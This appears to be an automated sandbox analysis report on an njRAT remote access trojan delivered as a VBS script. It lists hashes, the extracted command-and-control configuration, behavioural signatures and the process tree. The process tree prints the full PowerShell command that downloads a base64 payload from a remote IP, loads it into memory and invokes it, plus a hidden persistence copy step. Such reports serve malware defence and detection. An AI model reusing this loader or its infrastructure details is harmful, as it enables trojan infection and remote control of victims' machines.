Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/09/2022, 22:08

General

  • Target

    RATNJNEW.vbs

  • Size

    577KB

  • MD5

    0673849361f4aa0726bc1e4704c3dc4b

  • SHA1

    76acf5375646a1885c361ca1838fa00c8e721ee2

  • SHA256

    b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb

  • SHA512

    e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9

  • SSDEEP

    96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

venomsi.mypsx.net:81

Mutex

4c6c9a1bbdc34e6ebe

Attributes
  • reg_key

    4c6c9a1bbdc34e6ebe

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4200
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3140

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          eedeb218af57d184b7a06908d84e1f4f

          SHA1

          da8c874abd286ac085f7105d3d9da30336b09509

          SHA256

          f514ecbc9a8915c19aab328ecb319f730ddaf6d6d35cbf7b67bcdd00a4a75d80

          SHA512

          3be9e8b318be85f46692414419847147d9be948e0178962e95ce32899c52a6f26ec94e464a69770bc7a212681f24657222eae14646e484b2d0423076784ec29c

        • memory/1388-133-0x000001C6D9D30000-0x000001C6D9D52000-memory.dmp

          Filesize

          136KB

        • memory/1388-134-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

          Filesize

          10.8MB

        • memory/1388-142-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

          Filesize

          10.8MB

        • memory/3140-138-0x0000000000400000-0x000000000040C000-memory.dmp

          Filesize

          48KB

        • memory/3140-143-0x0000000005120000-0x00000000051BC000-memory.dmp

          Filesize

          624KB

        • memory/3140-144-0x00000000057F0000-0x0000000005D94000-memory.dmp

          Filesize

          5.6MB

        • memory/3140-145-0x0000000005390000-0x0000000005422000-memory.dmp

          Filesize

          584KB

        • memory/3140-146-0x0000000005370000-0x000000000537A000-memory.dmp

          Filesize

          40KB

        • memory/4200-137-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

          Filesize

          10.8MB

        • memory/4200-136-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

          Filesize

          10.8MB